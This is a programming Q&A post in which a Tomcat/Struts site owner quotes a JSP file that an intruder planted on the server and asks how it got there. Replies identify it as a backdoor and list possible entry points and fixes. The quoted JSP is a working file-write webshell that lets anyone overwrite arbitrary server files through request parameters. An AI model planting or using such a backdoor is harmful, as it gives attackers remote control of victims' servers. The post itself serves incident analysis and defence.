# Why are unknown files uploaded on server appearing?

Tags: java, security, jsp, web

I have a Struts 2 web application served by Tomcat 7.0.42. I recently have found files I haven't upload. Here I show an example

```
<%@ page language="java" pageEncoding="gbk"%>
<jsp:directive.page import="java.io.File"/>
<jsp:directive.page import="java.io.OutputStream"/>
<jsp:directive.page import="java.io.FileOutputStream"/>
<% int i=0;String method=request.getParameter("act");
if(method!=null&&method.equals("yoco")){
String url=request.getParameter("url");
String text=request.getParameter("smart");
File f=new File(url);
if(f.exists()){
f.delete();
}
try{
OutputStream o=new FileOutputStream(f);
o.write(text.getBytes());
o.close();
}catch(Exception e){
i++;
%>0<%
}
}
if(i==0){
%>1<%}
%>
<form action='?act=yoco' method='post'>
<input size="100" value="<%=application.getRealPath("/") %>" name="url">
<br>
<textarea rows="20" cols="80" name="smart">
```

which is a small JSP used to write files on my server. Some days ago they got access to the shell and all server went down due to some kind of DDoS attack.

I really want to know how they can write files on my server. I have some forms to interact with users but all fields are regular expression restricted and I use prepared statements to hit my database. You can have a look in case you want to see the problem "in action" ([link](http://www.cercoscuola.com))

Any help is so much appreciated. Thanks!

Comment: This script potentially allows any file on the server (potentially even on the network) to be replaced with arbitrary content, limited only by permissions on the web server.  Even if permissions are appropriate, this script still violates the concept of defense in depth by relying on a single layer of security.  The `url` parameter should be restricted to specific file locations, and disallow values outside of expected ranges.

Comment: Well this script is not mine. Somebody has uploaded it to my server. I would like to know how. Thanks!!

Comment: See http://stackoverflow.com/questions/20243561/what-is-this-code-doing, which contains the same code sample.  Your web server was compromised through some vulnerability (not possible to identify from the code alone), and this page allows a form of remote control for the attacker.

Comment: what would you think about a cron job that checks for new files and delete them? It would be better to know which is the vulnerability. Can anyone describe a list of possible vulnerabilities?

Comment: How did you fix this?

Comment: Doing a cron job that checks for new files might not work, since the "creation" or "modification" date of files can be modified. Most clever hackers will do that to prevent you from removing their backdoor.

Answer (score 0):

Clearly that is a backdoor uploaded by some malicious user / hacker.

Why that file ended up there might be because of several reasons:

- The hacker have access to your FTP/SSH (try changing users)
- If you have some "public upload file" feature, it might be vulnerable letting users upload whatever they want.
- You have some remote code execution in your system.
- SQL Injection vulnerability and they where able to retrieve passwords from your database to access some sort of administrative panel that gave them right to upload files or depending on the database and the database user permission they could even have written the file using a query.

What I recommend:

- Update your softwares (frameworks, CMS, WebServer, OS, API, etc).
- If you have proprietary code do some auditory on it and search for vulnerability.

good luck!